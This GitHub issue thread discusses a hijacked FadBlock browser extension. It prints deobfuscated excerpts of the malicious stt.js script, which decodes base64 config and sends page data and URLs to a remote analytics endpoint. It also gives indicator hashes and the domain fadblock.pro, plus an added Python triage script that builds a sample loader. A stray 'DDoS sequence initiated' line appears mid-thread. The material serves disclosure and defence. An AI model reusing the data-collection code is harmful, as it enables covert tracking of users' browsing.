Closed JaielZeus closed 4 months ago
+1
+1
Same problem here.
I have no problem enabling the new permissions if they are "necessary", but it is important to know what they are going to be used for.
I can't find information in the README.md or in the GitHub releases.
Thank you
For me, the update also made it so the extension doesn't work and it requires a payment.
Agreed, as long as they're necessary but I also have the license issue, asking for another payment.
I see that several of you are being asked to pay license fees. I clarify that in my case he is not asking me.
What may be different is that I reinstall the extension.
I leave a screenshot.
I also would like to know why the extension now needs more permissions.
I have removed the extension now and gone back to Adblocker, as it does the same job, has a reason to have the permission to read data on all sites, and is serious enough for me to accept these intrusive permissions.
Same. I would like to know why the extension now needs wide open permissions to read and change data on all websites before I re-enable it.
Same. This seems a little fishy. Too bad as it worked well while it worked...
Same thing here on Brave:
This is very worrying because the last commit (code change) here dates from November 2023! And the latest release is from October 2023. I think there is a big suspicious problem with this extension.
My take is: don't accept these permission changes and wait for news from the devs here. I just installed the latest available build from GitHub, and it works: https://github.com/0x48piraj/fadblock/releases
This is crazy. I am no longer the owner of the extension. I sold it over a month ago, seems like it traded hands and now the current owner has added malicious code while keeping the extension as it is!
I am taking immediate action and will release a new version of the clean codebase for everyone to use.
I am also thinking of pursuing legal action as it appears they have retained access to my PayPal and other support links!
As of now, I have updated the repository with this new information (https://github.com/0x48piraj/fadblock/commit/4a131670c6cd16bf9844bc50f65a8c6202ffb015) and now will start working on forking and deploying the clean version as soon as possible.
As of now, the clean version has been submitted to the store under a new name.
Now I will start notifying users and trying to control the exposure.
I will also urge you all to report the malicious extension so it can get removed as soon as possible.
I also have filed a report providing the team with support materials,
Any details on what the malicious code is doing?
Yes, being an independent security researcher, this falls under my jurisdiction. I've already started inspecting the code, identified the malicious code block, and am currently conducting an investigation.
Here's the whole source if anyone else is interested, mdadjjfmjhfcibgfhfjbaiiljpllkbfc-v2.7.zip
Here are the details of the malicious file:
File name js/stt.js
File size 249,607 bytes
md5 da0ab10b04e7c069d87b11d99b9ca512
sha1 b4a65d866e9cff6c9517f8a6af6c5a7e3027be88
sha256 5366039a45019653ef1f6bf1b948fdbff3b50fd753096c5ab25f19297fc3e9ba
sha384 090e9629520d85aa4d48a51abffb776083acf85cf138b2849cbd4b7a5ee9e813e8a9e1a80f15ada543e2d2602f591839
sha512 94996e20f3cd61a34e111ab2eca57a3ac9decffdab8a62d1ccbc0aa66bc833e302106716494fb442d80b5de44c1a243dbf65e24dab1b0fc0ac6aa28d49c0b3df
After a cursory analysis, it seems like it's a modified jQuery base coupled with data collection slash adware modules.
The data is sent to the endpoint named fadblock.pro.
A few manual methods exist to block access to any website domain, such as editing your HOSTS file but for Chrome I would suggest doing the following,
Here's some quick DNS information on fadblock.pro:
Domain: fadblock.pro
Registrar: NameCheap, Inc.
Registered On: 2024-01-21
Expires On: 2025-01-21
Updated On: 2024-01-21
Status:
clientTransferProhibited
addPeriod
Name Servers:
dns1.registrar-servers.com
dns2.registrar-servers.com
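The hashes and the endpoint posted above are the indicators this thread gives for the hijacked build, and the later analysis of stt.js points at two further static tells: the extension asking for host access to every site, and a script that decodes a long run of base64 config fields (atob(e.fad1) through atob(e.fad20)). The script below is an added triage example, not code from the thread or from the FadBlock project. It assumes the extension has already been unpacked to a directory (a Chrome profile's Extensions folder or an unzipped CRX) and checks each .js file against the posted hashes, looks for references to fadblock.pro, counts atob() calls, and flags broad host permissions in manifest.json. The file names, thresholds and the sample extension it builds are constructed for the demonstration.

```python
"""Static triage of an unpacked browser extension directory (added example, not from the thread)."""
import hashlib
import json
import os
import re
import tempfile

# Hashes posted in the thread for js/stt.js from the hijacked 2.7 build.
KNOWN_BAD = {
    "md5": "da0ab10b04e7c069d87b11d99b9ca512",
    "sha1": "b4a65d866e9cff6c9517f8a6af6c5a7e3027be88",
    "sha256": "5366039a45019653ef1f6bf1b948fdbff3b50fd753096c5ab25f19297fc3e9ba",
}
# Endpoint named in the thread as the data-collection server.
KNOWN_BAD_DOMAINS = {"fadblock.pro"}
# Match patterns that grant "read and change data on all websites".
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
ATOB_THRESHOLD = 10  # assumed heuristic: benign scripts rarely decode this many fields


def digest_bytes(data):
    """Return md5/sha1/sha256 hex digests of a byte string."""
    return {name: hashlib.new(name, data).hexdigest() for name in KNOWN_BAD}


def file_hashes(path):
    with open(path, "rb") as f:
        return digest_bytes(f.read())


def broad_host_permissions(manifest):
    """Collect broad host patterns from permissions, host_permissions and content_script matches."""
    found = set()
    for key in ("permissions", "host_permissions"):
        found.update(e for e in manifest.get(key, []) if e in BROAD_HOSTS)
    for cs in manifest.get("content_scripts", []):
        found.update(m for m in cs.get("matches", []) if m in BROAD_HOSTS)
    return sorted(found)


def script_indicators(text):
    """Cheap string-level indicators for one script file."""
    return {
        "atob_calls": len(re.findall(r"\batob\(", text)),
        "sendMessage_calls": len(re.findall(r"chrome\.runtime\.sendMessage\(", text)),
        "bad_domains": sorted(d for d in KNOWN_BAD_DOMAINS if d in text),
    }


def triage(ext_dir):
    """Walk an unpacked extension and return a list of human-readable findings."""
    findings = []
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as f:
        manifest = json.load(f)
    broad = broad_host_permissions(manifest)
    if broad:
        findings.append("broad host access: " + ", ".join(broad))
    for root, _, files in os.walk(ext_dir):
        for name in sorted(files):
            if not name.endswith(".js"):
                continue
            path = os.path.join(root, name)
            rel = os.path.relpath(path, ext_dir)
            hashes = file_hashes(path)
            if any(hashes[k] == v for k, v in KNOWN_BAD.items()):
                findings.append(f"{rel}: hash matches known malicious stt.js")
            with open(path, encoding="utf-8", errors="replace") as f:
                ind = script_indicators(f.read())
            if ind["bad_domains"]:
                findings.append(f"{rel}: references " + ", ".join(ind["bad_domains"]))
            if ind["atob_calls"] >= ATOB_THRESHOLD:
                findings.append(f"{rel}: {ind['atob_calls']} atob() calls (heavy base64 decoding)")
    return findings


def build_sample_extension():
    """Constructed sample extension (not the real file) showing the tells described in the thread."""
    d = tempfile.mkdtemp()
    manifest = {
        "manifest_version": 3, "name": "sample", "version": "0.0.1",
        "host_permissions": ["<all_urls>"],
        "content_scripts": [{"matches": ["*://*.youtube.com/*"], "js": ["js/stt.js"]}],
    }
    with open(os.path.join(d, "manifest.json"), "w", encoding="utf-8") as f:
        json.dump(manifest, f)
    os.mkdir(os.path.join(d, "js"))
    lines = ["fetch('https://fadblock.pro/check/extension').then(r => r.json()).then(e => {"]
    lines += [f"  const v{i} = atob(e.fad{i});" for i in range(1, 21)]
    lines += ["  chrome.runtime.sendMessage({action: 'fad-action-analytic', url: v1});", "});"]
    with open(os.path.join(d, "js", "stt.js"), "w", encoding="utf-8") as f:
        f.write("\n".join(lines))
    return d


if __name__ == "__main__":
    for line in triage(build_sample_extension()):
        print(line)
```

Point triage() at a real unpacked extension directory to run it against something other than the constructed sample. A hash match is conclusive for the specific file posted here; the atob count and the broad host patterns are only heuristics that justify a closer manual look, not a verdict.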
DDoS sequence initiated
I uninstalled the malicious version, but is there anything I should be concerned about in terms of my data? Change passwords on sites etc. that were used?
I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.
It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.
I would notify what the malware strain's capabilities but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.
I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.
It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.
I would notify what the malware strain's capabilities but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.
Thank you @0x48piraj
I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version.
Take your sleep, you did the most important thing by alerting everybody here; we are sharing the news too. Thanks for that. (I know this kind of rush, so I support you...)
Just a question: you said you sold this app to these guys? Can you tell more about it, or is it private? Just to understand the situation.
I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.
In stealing sessions, what kind of information can be taken from a session? Would that include username/password entered in the session or anything displayed in the browser for that session?
Would that include username/password entered in the session or anything displayed in the browser for that session?
No. Basically, to be sure, just log out of every website you are currently logged in to, and these sessions will be disabled, so unusable. User data should not be present in sessions, just tokens for the current ... session.
@benalt613 I don't even think it steals your sessions as of now but it acts as a CnC center of some sort and sends analytical data (probably URLs you visit) to the attacker's server.
Here's the code bit:
if ($('img')) {
$('img')
.each(function(index, value) {
if ($(this)
.attr(gz)) {
let sc = $(this)
.attr(gz);
if (sc.includes(go)) {
chrome.storage.local.get(["fad_yt_block"])
.then((t) => {
t.fad_yt_block && (e = JSON.parse(t.fad_yt_block));
chrome.runtime.sendMessage({
action: "fad-action-src",
url: gi,
pl: {
sc: btoa(sc),
cf: btoa(e)
}
}, function(e) {});
});
}
}
});
}
e && chrome.storage.local.set({
fad_yt_ep: btoa(e + " | " + t)
})
.then(() => {});
})),
v &&
chrome.runtime.sendMessage({
action: "fad-action-text",
url: u
}, function(e) {
const t = /6kU.*?"/gm;
let n;
const r = e;
let u = "";
for (; null !== (n = t.exec(r));)
n.index === t.lastIndex && t.lastIndex++,
n.forEach((e, t) => {
u = e;
});
(u = u.replace('"', "")),
u &&
((u = p + u),
chrome.runtime.sendMessage({
action: "fad-action-json",
url: c + u
}, function(e) {
const t = e.id,
n = e;
chrome.runtime.sendMessage({
action: "fad-action-json",
url: l + u
}, function(e) {
let r = e.data;
chrome.runtime.sendMessage({
action: "fad-action-json",
url: f + u
}, function(e) {
let l = e.data;
chrome.runtime.sendMessage({
action: "fad-action-cf",
url: f1,
c: f2
}, function(e) {
let l1 = e;
chrome.runtime.sendMessage({
action: "fad-action-analytic",
url: o,
pl: {
a: i,
b: u,
c: n,
d: r,
e: l,
f: t,
g: a,
h: s,
i: g,
k: l1
}
}, function(e) {
chrome.storage.local.set({
fad_yt_block: JSON.stringify(t)
})
.then(() => {});
});
});
});
});
}));
So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.
@poka-IT Appreciate your politeness. Unfortunately, I'm bound by a signed agreement that prohibits me from disclosing any information about the owner and the transaction.
And, as I have said above, it's not the buyer, it traded hands again it seems - I have sent a harshly worded email nonetheless.
I'm reading the code you provided, I don't see any malicious code on my side.
External requests are only made to https://fadblock.pro/check/extension, and it just fetches data; it doesn't seem to send anything there.
Response is
{"sstcode":200,"fad1":"https:\/\/play.google.com","fad2":"play.google.com","fad3":"6000","fad4":"videoplayback","fad5":"https:\/\/www.youtube.com\/youtubei\/v1\/notification\/get_unseen_count","fad6":"https:\/\/googleads.g.doubleclick.net\/pagead\/id?v=","fad7":"https:\/\/www.youtube.com\/youtubei\/v1\/player","fad8":"https:\/\/play.google.com\/log?format=json&hasfast=true&authuser=0","fad9":"video-","fad10":"100","fad11":"50","fad12":"https:\/\/jnn-pa.googleapis.com\/$rpc\/google.internal.waa.v1.Waa\/Create"}
So probably just metadata for analytics, as you said. Probably logging the IP address, that's it. But I'm just a Linux sysadmin, not a security expert, so maybe I missed something.
No, I think you're right @poka-IT. That's my working theory as well.
However, requesting permissions for every site is inherently a malicious action, so it's best to err on the side of extra caution. It has a lot of jQuery boilerplate nonsense and useless base64 encodings.
If they are developing it into a general adblocker - that may grant using the permissions they have but the base64 encoding, cryptic function names, and needless obfuscation, not to mention the tracking - point only to one thing - adware/malware.
So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.
@0x48piraj Thanks. I've also decided to create a separate Chrome profile with limited extensions for sessions containing logins that need to be more secure.
Yes, stt.js looks like a minified file, but it is not, as there are line breaks and indents. A minifier will never do this kind of incremental base64 mapping:
const o = atob(e.fad1),
i = atob(e.fad2),
a = atob(e.fad3),
s = atob(e.fad4),
u = atob(e.fad5),
l = atob(e.fad6),
c = atob(e.fad7),
f = atob(e.fad8),
p = atob(e.fad9),
d = atob(e.fad10),
h = atob(e.fad11),
g = atob(e.fad12),
gn = atob(e.fad13),
go = atob(e.fad14),
gi = atob(e.fad15),
gx = atob(e.fad16),
gy = atob(e.fad17),
gz = atob(e.fad18),
f1 = atob(e.fad19),
f2 = atob(e.fad20);
But a normal human will never code like this either, with consts here and, 5 lines below, variables with the same names but in a restricted scope:
var n = [],
r = Object.getPrototypeOf,
o = n.slice,
i = n.flat
? function (e) {
return n.flat.call(e);
}
: function (e) {
return n.concat.apply([], e);
},
a = n.push,
s = n.indexOf,
u = {},
l = u.toString,
c = u.hasOwnProperty,
f = c.toString,
p = f.call(Object),
d = {},
on 4000 lines ...
LLMs don't do that either; they use human-readable names, unless they have received such instructions. This is machine-generated code, or this is artistic obfuscation. Maybe an LLM could help to understand it.
Hello @0x48piraj I'm new here and I would just like to ask, does removing the extension from my browser remove potential remote access from their servers or would there still be remnants of their codes embedded that I should be worried about? (sorry for the question I'm still a beginner)
@0x48piraj Is the Firefox version also affected?
The new extension is under review process and hopefully will be released soon and we can shift over there. The funny thing is, I was also affected as I use FadBlock on YT by default lol.
@That1BlueMew, no, the Firefox version is still under my control and thus, it's completely safe.
@SImone-Cow, as of now, the extension doesn't steal data so I think we are safe. Also, yes, just removing the extension will remove everything, no remnants, nothing. Clean slate.
Thank you so much, that removed my fear. I use Firefox as my main browser for everything; I was about to rotate everything.
Thank you so much @poka-IT for collaborating on this. I will finally doze off now as it's been 24 hours since the incident and I don't think I can go on any longer without sleep.
I used this tool to deobfuscate stt.js: https://github.com/ViZiD/humanify
Result here: deobfuscated.zip. Maybe it helps, maybe not.
Now we are on 9000 lines. You're welcome, ahaha.
Thanks for your hard work and efforts @0x48piraj; despite not being the owner of FadBlock anymore, you still manage to help us and provide insights regarding the problem.
So the suspicious code becomes:
let ownerDocument = childSeparator(unsupportedSelectors).val();
if (childSeparator("img")) {
childSeparator("img").each(function (index, value) {
if (childSeparator(this).attr(variableGz)) {
let encryptedData = childSeparator(this).attr(variableGz);
if (encryptedData.includes(variableGo)) {
chromeAPI.localStorage.local
.get(["fad_yt_block"])
.then((ownerDocument) => {
if (ownerDocument.youtubeData) {
element = JSONParser.parse(ownerDocument.youtubeData);
}
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-src",
url: variableGi,
pl: {
encryptedData: encodeBase64(encryptedData),
cf: encodeBase64(element),
},
},
function (element) {},
);
});
}
}
});
}
if (element) {
chromeAPI.localStorage.local
.set({
fad_yt_ep: encodeBase64(element + " | " + ownerDocument),
})
.then(() => {});
}
},
);
}
if (returnValue) {
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-text",
url: isXMLDoc,
},
function (element) {
const ownerDocument = /6kU.*?"/gm;
let cache;
const result = element;
let isXMLDoc = "";
for (; (cache = ownerDocument.exec(result)) !== null; ) {
if (cache.index === ownerDocument.lastIndex) {
ownerDocument.lastIndex++;
}
cache.forEach((element, ownerDocument) => {
isXMLDoc = element;
});
}
isXMLDoc = isXMLDoc.replace('"', "");
if (isXMLDoc) {
isXMLDoc = isHTMLDoc + isXMLDoc;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-json",
url: querySelectorAll + isXMLDoc,
},
function (element) {
const ownerDocument = element.id;
const cache = element;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-json",
url: document + isXMLDoc,
},
function (element) {
let result = element.data;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-json",
url: documentElement + isXMLDoc,
},
function (element) {
let document = element.data;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-cf",
url: variableF1,
querySelectorAll: variableF2,
},
function (element) {
let cfData = element;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-analytic",
url: divider,
pl: {
length: index,
remainder: isXMLDoc,
querySelectorAll: cache,
support: result,
element: document,
documentElement: ownerDocument,
matches: length,
unsupportedSelectors: matchesSelector,
index: matches,
newResult: cfData,
},
},
function (element) {
chromeAPI.localStorage.local
.set({
youtubeData:
JSONParser.stringify(ownerDocument),
})
.then(() => {});
},
);
},
);
},
);
},
);
Where:
variableGz = fad18
variableGo = fad14
variableGi = fad15
The thing is, the response from https://fadblock.pro/check/extension stops at fad12, so there is a world where this request returns more stuff.
I think the easiest way is to execute this app in a sandbox and analyse the requests. Or maybe we just don't care.
I think we should do the latter @poka-IT, I couldn't sleep as this incident was eating up my conscience but thanks to the Chrome team, the previous authentic version was just now published!
Share this version wherever you can (and I will do the same): https://chromewebstore.google.com/detail/fadblock-origin-friendly/lmnhcklabcehiohmmeihcheoegomkghm?hl=en
I'm sorry for being direct here but I lost my trust in this extension and moved on to my good old Adblocker. Selling the extension for a quick cash grab and putting the userbase under the bus like that is just so bad. As they say: trust is hard to gain but easy to lose. Wish you good luck for the future of this extension but I'm out though...
You should probably also steer clear of this extension: Adblock for Youtube™. It isn't the Fadblock extension; it is a separate extension which works differently with 10M+ users. It uses the same icon and it also requires invasive permissions for every website.
Thank you @0x48piraj for stepping back in. I supported and paid for Fadblock when you were still the owner and am appreciative for this extension every day. Even more so that you came back and resurrected the original so quickly!
I completely understand, @JaielZeus, in my defense, I thought I took precautions to ensure the buyer wouldn't use it maliciously, but it exchanged hands again. I transferred the extension because I believed it could benefit all users. Maintenance had become challenging, and I envisioned FadBlock evolving into a robust full-blown ChatGPT-powered powerhouse, capable of generating transcripts, language translation, and more, with significant potential…and I didn't have the time to tend to it.
I did all this solely because of the few people who supported this project, whether monetarily or emotionally amid all the negativity, and I couldn't leave you all hanging. This isn't about seeking forgiveness or anything, I just see it as my duty.
This is so bad: first selling us "lifetime" keys, then selling the software to an unknown third party??
Are you really sure that this extension does not transfer cookies or users and passwords to the fadblock.pro domain? I'm asking you because a few days ago (January 26th) we had a hack on a Facebook account and I'm almost sure it was caused by this extension with malicious code. No dangerous files were opened on the computer where this extension was installed and coincidentally a few days earlier authorization had been given to read and modify all data on all websites.
@christian100kodehode, in the memo, the licenses were to be retained - which they still are - but I never thought they would try to package the extension into malware.
I have published a new version - replicated the whole database so that lifetime users can log in effortlessly again without any re-payment hassles or even reaching out for troubleshooting.
I am also planning to open-source the current version's codebase and reverse the open-core status. I am very sorry for all the commotion but I never expected any of this. The support was bare-minimum and I wanted to hand it off so it could evolve into something even bigger and better. :/
@fabriziocarloni, I think so, as you can see here on the thread, I and @poka-IT both came to the same conclusion while independently investigating.
@0x48piraj As suggested by @poka-IT the only way to understand what this modified extension really does is to run it in a sandbox and then analyze its requests. I'm sorry but in my opinion it was this extension with malicious code that was the cause of the hack we had.
As said previously, I am in no way saying it's not uploading anything, it was @poka-IT who deep-dived and uncovered the requests, it's better to switch out, and have a security audit of our accounts - I did the same.
The extension was updated overnight and now needs more intrusive permissions on Chrome to work again. I would like to know the reason why you need that, @0x48piraj? I would think reading the data from youtube.com is already enough for this extension to work, wouldn't you say so too? What is the reason here? I am really hesitant to re-enable it, and this sucks, especially since I paid for premium and now the extension becomes intrusive like that.